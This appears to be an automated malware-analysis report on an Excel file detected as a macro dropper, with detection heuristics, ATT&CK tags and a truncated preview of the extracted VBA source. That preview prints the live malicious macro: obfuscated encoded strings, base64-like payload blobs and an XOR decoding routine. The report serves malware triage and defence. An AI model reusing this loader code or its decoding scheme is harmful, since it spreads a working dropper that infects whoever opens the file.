MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The file contains VBA macros that utilize the Shell() function, a common technique for executing arbitrary commands. The ClamAV detection name 'Doc.Dropper.Agent-6879997-0' strongly suggests its function as a dropper. The embedded VBA code, though truncated, appears to contain obfuscated data that could be a payload or configuration for a downloader.
Heuristics 4
-
ClamAV: Doc.Dropper.Agent-6879997-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6879997-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7259 bytes |
SHA-256: feac765845016ff32f686ad04b152dc053844042f627cfa0402fdadac6f14d04 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 6 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function UpdayeLinkss()
UpdayeLinkss = "066089090113017021100065093082080071064018017023087082126125023020019016082071113082102116023020019018019101091068087067102092118126125021020030092126069102092084088121113019031127090090122018028098020002018017024113107119114096096090125127101123127018017087077099083098102020019018017027020027018021070124118094125124080104003108030016096122084121088122118106004007110025022109019026026019105022019026017123081100031094087094118113069021020122125031118091126066099112071096123094123026087119119089117071087098097102086115092029111090093031088113094125067108071071064084084089110105082090122069119067097105009008119071091094080080070113005006098097102122092118029019067"
End Function
Function AddinContns()
AddinContns = ComactD & TestCells & HistoryLog & FalseValue12 & OnResolutionV & ggF
End Function
Function ComactD()
ComactD = "Vxtjts4DL1K6mS3GRjbPYARtPcwBph7DDJnr2XZlki+R9KZH1u0tkxT5OPjh5W9ff738XF7Pi6X8XK53d8ul+n2eS3/vtU7y4Xy98fPr+Wvj3E8bizr7pf35+PeLe0fG/eHqsyvsdy/g6Vq4Xytd5vcR5PZVKmL///4KLruYvH7l3UT0/OQ+LZtdLqKPT3wfsr9288fT6kne/s/11+pzZer4ypnmId1t8NtEf/ns2g3zFW5y+V9ubXc+PN5uTzfhrmsWoUM6wPr25an3+vjy8OL8EVeddcudvHxUCWVf/0u4ndLrOLfh2nf1TD8ugs99tftouZDlnxfp9P0HLb7Rcyi97qmaFEUPaRXJRZ5h2Jl0arUsePVVOXyiqj3HQm7ZTsVDsNYFd/2DZd3VRVXAdtDxVLV2vWpxTP/bivubfF99daqSEXDBtD14iK4bm/sV63gbouqcvVt63bG/mktsl9dgD9SKVKLCj+0upfS6ddfKQuVvPKU1etqFq/Pl5frpfXP9eXe4vVlyx+jXtK/vPy7ugopVEwI3mFMVGNQrVx347pTyyqvMz5oO8u9EUBIrvJBpJ6XFtDO9+Rsl8syufU8DgEKPVWcTSaA5wLXOKEgZrNOAoEeTKukXnbFJA7fInGCWC1/kxJQ4NY/J29ru9YArCN8K36HEWnYQuo3W3EVO70gjyu1/wmuzgLch3eGIVH4fY8jHTSZl7ZHbRAShiBoCBbJ11YuI27Q7NXjRlpD4TvJxRETS1WZzVqeYbpyN0kt2nXprSjSOThloFg28vMaAqwNv8N2kFu9nKU1RfzALT5R3exVg8JJKDI184IXdejk9rJs1t6OKGK/iz0qEtvBVMfCxnhqleV8Q0VHxLVHt121rGUMJBAYJOhJeYHwLt44vMH87V9HDIEwVY0Js0XthEZw6US0iGSSSYnCNwCtIm3DDWriPDTH2IwZiOzGyI1wQqsPlRCkLStvRWYxvv9"
End Function
Function DateAndTime()
DateAndTime = Application.International(xlCountrySetting)
End Function
Function TestCells()
TestCells = "uvBkLovwm4lLg2EExucNQrEsdyffnkWrLac2RjeeovQj1pgMu5c0IoYbDIMZTEYiTbJwg7R4QvkmQ5oSKt1fr6QivV00Foz1Yl7mVHwhurxTGZjupN3bb1QDfXqGJBFIgrAT1xSpYYGZ/u4fhbSfmCukluEWbK8/RHbyjC2sTDgHZ0YIumbJJW3k6XVsHERJ0IscvyBAUBA3mSRDHe8+6FlAzb9k9bXkyAxHKiwWUq4F2iNzcCiTQGXIUolzkCJD3BMdongg5FV0TsRI2MTIS6vLJCGDEr4toSdPVBDZ1o2TyHbrws70lAtBNo/akSWO1mWZs0oLhVg8BhGPU8BvqUWxfQXopzU97O2WxwIYW0QweN9vJWqmrfD0he/+Id+y0XmjfHYp7/E9Pbla5z5lxKRjQNW+x3jfs61vXEXW3YNpxNLx2nGTNIxcejOKOb7ysiPNroiDiWW9PRfv2zNQIhyAHhskeGzPS9kLriovMLqZOpGFg7E1nUiz4bU1mWlHVN1879H7wVdtlTk/NdArVzsxOCJEQsuFLhrPa8XqSvpMpCFAantQjPsEgWq14ZZMw7bMZGUcksDPboP4wewDMQ/V1E7u2/rZ9D8yuKnyg4U2bJLAohjU/JihUXUKTIc2001Ny+VFMRSr2D3kz1nMwNsGLsjT9EITMhFO5UjJOhoxAu1ndNzEZdydRgtItY9PZ8zhjClDOo0E4H9jYtSBNJmZgh8I0RlRJOuvofQmfxui981HdWnfFjwJoOu0QmubNsOTnbTgtHSdtFSPO713p8Diot3a/Apwom8ohuZNqJaS6F2CBbhtSV6aSAA7S2eT1GX+YOtGw4DuA+8FRmVf7F439HecOvLzUNPt78SZFftNAh5G98m1RYomtfGimONliIZSdIg2BGTDfI8cLbE/Azka5/SU/G8VJmswF2hwq09NTqx9TQpaDI6zD+XZaEVMmB99/jZWMADbJPH+w"
End Function
Public Function VersionAccu(ByVal SaveLink As String, ByVal LineToLine As String) As String
Dim a, b, c, d As String
Dim SubLin As Long
Dim SubCom As Long
Dim bb As Long
c = SaveLink
b = LineToLine
a = ""
SubLin = Len(c)
SubCom = Len(b)
For bb = 1 To SubLin Step 3
a = a + Chr(Val(Mid(c, bb, 3)) Xor Asc(Mid(b, (Int(bb / 3) Mod SubCom) + 1, 1)))
Next bb
VersionAccu = a
End Function
Function HistoryLog()
HistoryLog = "quffsEqcMXNhw7ApJaoecdoy3O8eF0D2CA4MkJpKqaumLg77wpyG3pM5Fvna0SBTKblFIOvzXzmk1jMGQDZkaX6iyCne9AQanPrk9gFaeqzmZt/2PhuvPq8dLJBJk5TWDlZ6RYqiRo/YErSGP0oyQWT4jT+nw/kqPhvK+6Go3AS9V5ut5TiRL1GqBNO4biqVeS+KSGCE7NFqzO7nKk6Ur/e7kSNO0IJGW6p/bsd/dc+Ax0uxF1G/6n+5QA13N4p58vweHy9XDHmu3hSfYdRWMpPCTE3DXYeb8vxOeBPqdrtx9RxzPswwUSonczoV4rmjUt5x69zuo5o1yDMRJMMfA/AO
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.